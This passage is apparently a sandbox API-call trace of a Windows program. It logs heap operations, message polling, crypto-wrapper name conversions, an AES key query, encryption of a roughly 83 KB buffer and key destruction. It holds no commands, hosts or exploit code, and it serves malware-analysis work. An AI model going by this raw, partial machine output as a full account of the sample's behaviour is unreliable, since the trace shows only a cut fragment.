lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.394] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.394] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.395] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0035.396] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.397] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.399] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.399] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.399] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0035.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.399] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.400] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.400] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.400] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.400] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.400] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.400] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.400] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.402] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14528, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14530) returned 1 [0035.402] CharLowerBuffW (in: lpsz="byte[83249]", cchLength=0xb | out: lpsz="byte[83249]") returned 0xb [0035.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.405] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x14528, dwBufLen=0x14530 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x14530) returned 1 [0035.408] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.415] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.416] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0035.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: 